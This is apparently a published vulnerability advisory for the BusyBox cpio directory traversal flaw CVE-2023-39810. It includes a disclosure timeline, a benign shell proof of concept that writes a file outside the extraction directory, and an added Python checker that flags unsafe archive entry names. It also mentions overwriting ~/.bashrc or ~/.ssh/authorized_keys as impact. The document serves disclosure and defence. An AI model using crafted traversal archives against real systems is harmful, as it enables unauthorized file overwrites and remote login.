Busybox cpio directory traversal vulnerability (CVE-2023-39810)
When extracting cpio archives with BusyBox cpio, the cpio archiving tools may write files outside the destination directory and there is no option to prevent this.
Summary
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L, 6.1 Medium
cpio is an archive format and also an archive handling tool. Several implementations exist, for example GNU cpio, bsdcpio, and BusyBox cpio. The BusyBox variant of cpio has been found to extract archives that contain relative file names with a ../ traversal pattern and this cannot be prevented.
While bsdcpio ignores archived files that have absolute file names or contain ../ and GNU cpio has a parameter to prevent extracting these file names, BusyBox processes archives with such names and there is no parameter to handle potentially untrusted archives.
Impact
If untrusted archives are extracted, this may result in writing files outside the destination directory. This could result in files being overwritten that contain configuration in the form of shell scripts such as ~/.bashrc or that enable a login from a remote side such as the ~/.ssh/authorized_keys file.
Timeline
2023-07-24: Vulnerability noticed.
2023-07-26: Initial contact of BusyBox maintainer via e-mail.
2023-08-01: Second try to contact BusyBox maintainer via e-mail. First try to contact developer of the module, but e-mail bounced. First contact to Debian security team, because BusyBox package is available via Debian packages.
2023-08-24: CVE-2023-39810 was assigned.
2023-08-28: Advisory published after not being able to get in contact with maintainer or developer.
2024-08-20: A patch was published. See section Patches and Workaround.
Affected Components
The issue affects BusyBox cpio in multiple versions on different platforms. Pentagrid tested the following versions and could successfully reproduce the issue.
BusyBox v1.33.2
BusyBox v1.30.1
Technical Details
The processing of relative and absolute file names could result in risks. For example the GNU cpio program was affected by the same vulnerability, referenced as "CVE-2005-1229 - Directory traversal vulnerability in cpio 2.6 and earlier allows remote attackers to write to arbitrary directories via a .. (dot dot) in a cpio file." A patch was developed and added to cpio 2.6-6, which requires an additional parameter --no-absolute-filenames to prevent files being overwritten. This option also works for relative file names with a ../ pattern. This is still an insecure default, but an improvement. However, some distributions seem to have reverted the patch.
BusyBox cpio is another implementation and it has no mechanism to avoid the processing of relative file names with a ../ pattern, as shown with the proof of concept below:
#!/bin/sh
set -e
echo + Clean-up
rm -rf /tmp/testcase
echo + Create a test archive
mkdir -p /tmp/testcase/a/b/
echo test > /tmp/testcase/testfile
cd /tmp/testcase/a/b/
(echo ../../testfile; echo /etc/hostname) | cpio -ov -H newc -O /tmp/testcase/a/b/archive.cpio --quiet
rm /tmp/testcase/testfile
echo + Extract archive
mkdir /tmp/testcase/a/b/etc
strace -f busybox cpio -iv < archive.cpio 2>&1 | grep 'hostname\|testfile' | grep -v read
echo + List files
find /tmp/testcase/
The final find command lists the extracted files:
/tmp/testcase/
/tmp/testcase/testfile <-- extracted rel. file
/tmp/testcase/a
/tmp/testcase/a/b <-- working directory
/tmp/testcase/a/b/etc
/tmp/testcase/a/b/etc/hostname <-- extracted abs. file
/tmp/testcase/a/b/archive.cpio <-- archive to extract
According to the output above, the testfile is written outside of the working directory.
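A defensive pre-check that rejects such an archive before it is handed to BusyBox cpio, added here as an example and not code from the advisory or from BusyBox: it walks the newc headers (the format the proof of concept creates with -H newc) and flags absolute names or any ".." path component without extracting anything. The archive bytes are constructed inline; build_newc, iter_newc_names and unsafe_entries are this example's own names.

```python
MAGIC = b"070701"  # "newc" (SVR4, no CRC) header magic; every header is 110 bytes

def _pad4(n):
    """Padding that rounds n up to 4 bytes; newc aligns names and data this way."""
    return (-n) % 4

def build_newc(entries):
    """Build a minimal newc archive in memory (constructed input for this example only)."""
    out = bytearray()
    for ino, (name, data) in enumerate(entries + [("TRAILER!!!", b"")], start=1):
        name_b = name.encode() + b"\0"
        # 13 fields of 8 hex digits: ino, mode, uid, gid, nlink, mtime, filesize,
        # devmajor, devminor, rdevmajor, rdevminor, namesize, check
        fields = [ino, 0o100644 if data else 0, 0, 0, 1, 0, len(data),
                  0, 0, 0, 0, len(name_b), 0]
        out += MAGIC + b"".join(b"%08X" % f for f in fields)
        out += name_b + b"\0" * _pad4(110 + len(name_b))
        out += data + b"\0" * _pad4(len(data))
    return bytes(out)

def iter_newc_names(blob):
    """Yield (name, filesize) per entry by walking headers; nothing is written to disk."""
    off = 0
    while True:
        if blob[off:off + 6] != MAGIC:
            raise ValueError("no newc header at offset %d" % off)
        fields = [int(blob[off + 6 + 8 * k:off + 14 + 8 * k], 16) for k in range(13)]
        filesize, namesize = fields[6], fields[11]
        name = blob[off + 110:off + 110 + namesize - 1].decode()
        if name == "TRAILER!!!":
            return
        yield name, filesize
        off += 110 + namesize
        off += _pad4(off)
        off += filesize + _pad4(filesize)

def is_unsafe_name(name):
    """Absolute names or any '..' component can land outside the destination directory."""
    return name.startswith("/") or ".." in name.split("/")

def unsafe_entries(blob):
    """Entry names that should block extraction, since BusyBox cpio has no option to skip them."""
    return [name for name, _ in iter_newc_names(blob) if is_unsafe_name(name)]

if __name__ == "__main__":
    sample = build_newc([("../../testfile", b"test\n"), ("/etc/hostname", b"h\n"), ("a/b/c", b"ok\n")])
    print(unsafe_entries(sample))  # ['../../testfile', '/etc/hostname']
```

The same name check can be run over the listing from cpio -t before deciding to extract, which avoids re-implementing the header walk where a trusted cpio binary is available.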
Precondition
An untrusted archive is extracted with the BusyBox cpio tool and the running cpio process has permissions to write files outside the destination directory.
Recommendation
Pentagrid recommends changing the default behaviour to ignore relative file names with a ../ pattern within a cpio archive. To process files with a directory traversal pattern, a command line flag could be introduced like it was done for GNU cpio.
Patches and Workaround
Users can specify on the BusyBox cpio command line which file name should be unpacked, which should be safe as long as no directory traversal is included in that file name argument.
Users may also consider using another cpio implementation or may ensure that archive files are trusted.
Peter Kästle implemented a patch for the BusyBox cpio command to filter relative file names. This patch was published via the BusyBox mailing list. However, at the time of updating this advisory, the patch was not merged into the BusyBox code base.
Credits
The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid.